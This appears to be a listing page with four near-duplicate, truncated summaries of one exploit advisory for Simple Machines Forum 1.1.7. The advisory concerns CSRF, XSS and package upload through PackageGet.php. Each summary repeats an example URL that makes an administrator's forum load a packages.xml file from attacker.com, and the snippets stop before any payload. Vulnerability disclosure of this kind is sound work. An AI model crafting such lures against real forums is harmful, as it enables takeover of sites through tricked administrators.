Simple Machines Forum <= 1.1.7 - CSRF/XSS/Package Upload

No description provided by source. Author: Xianur0 Vulnerable Version: All The Bug is located in the file: Sources/PackageGet.php Example: http://victm.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com When the admin link between the SMF to load the file:...

Simple Machines Forum 1.1.7 XSRF/XSS

Author: Xianur0 Vulnerable Version: All The Bug is located in the file: Sources/PackageGet.php Example: http://victm.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com When the admin link between the SMF to load the file: http://attacker.com/packages.xml Save this file as...

Simple Machines Forum (SMF) 1.1.7 - Cross-Site Request Forgery Cross-Site Scripting Package Upload

Simple Machines Forum SMF 1.1.7 - Cross-Site Request Forgery Cross-Site Scripting Package Upload Author: Xianur0 Vulnerable Version: All The Bug is located in the file: Sources/PackageGet.php Example: http://victm.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com When the adm...

Simple Machines Forum &lt;= 1.1.7 XSRF/XSS/Package Upload Vuln

No description provided by source. Author: Xianur0 Vulnerable Version: All The Bug is located in the file: Sources/PackageGet.php Example: http://victm.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com When the admin link between the SMF to load the file:...